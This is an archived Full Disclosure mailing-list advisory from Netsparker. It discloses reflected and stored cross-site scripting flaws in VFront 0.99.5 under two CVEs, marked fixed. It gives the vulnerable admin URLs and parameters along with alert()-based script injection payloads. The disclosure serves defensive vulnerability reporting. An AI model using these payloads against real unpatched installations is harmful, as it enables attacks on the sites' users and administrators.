[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAKD6+R53LBRkLa0L1gm_UF3ftvVhoNk0vr0=fOM=rfhfWTeuHQ@mail.gmail.com>
Date: Tue, 28 May 2019 10:29:31 +0200
From: Daniel Bishtawi <daniel@...sparker.com>
To: fulldisclosure@...lists.org
Subject: [FD] Cross-site Scripting Vulnerabilities in VFront 0.99.5
Hello,
We are informing you about the vulnerabilities we reported in VFront 0.99.5.
Here are the details:
Advisory by Netsparker
Name: Multiple Reflected Cross-site Scripting in VFront 0.99.5
Affected Software: VFront
Affected Versions: 0.99.5
Homepage: http://www.vfront.org/
Vulnerability: Reflected Cross-site Scripting
Severity: High
Status: Fixed
CVE-ID: CVE-2019-9839
CVSS Score (3.0): 7.4 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Netsparker Advisory Reference: NS-19-002
Technical Details:
URL: http://{domain}/{vfront_path}/admin/menu_registri.php
Parameter Name: descrizione_g
Parameter Type: POST
Attack Pattern: <scRipt>alert(0x00938D)</scRipt>
URL: http://{domain}/{vfront_path}/admin/sync_reg_tab.php?azzera=
Parameter Name: azzera
Parameter Type: GET
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x0067C2)</scRipt>
-------
Advisory by Netsparker
Name: Stored Cross-site Scripting Vulnerability in VFront
Affected Software: VFront
Affected Versions: 0.99.5
Homepage: http://www.vfront.org/
Vulnerability: Stored Cross-site Scripting
Severity: High
Status: Fixed
CVE-ID: CVE-2019-9838
CVSS Score (3.0): 8.6 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Netsparker Advisory Reference: NS-19-003
Technical Details;
Injection Technical Details
URL: http://{domain}/{vfront_path}/admin/sync_reg_tab.php?azzera=
Parameter Name: azzera
Parameter Type: GET
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x0067C2)</scRipt>
Identification Technical Details
URL: http://{domain}/{vfront_path}/admin/error_log.php
For more information:
-
https://www.netsparker.com/web-applications-advisories/ns-19-002-reflected-cross-site-scripting-in-vfront/
-
https://www.netsparker.com/web-applications-advisories/ns-19-003-stored-cross-site-scripting-in-vfront/
Regards,
Daniel Bishtawi
Marketing Administrator | Netsparker Web Application Security Scanner
Tel: +44 (0)20 3588 3843
Follow us on Twitter <https://twitter.com/netsparker> | LinkedIn
<https://www.linkedin.com/company/netsparker-ltd> | Facebook
<https://facebook.com/netsparker>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists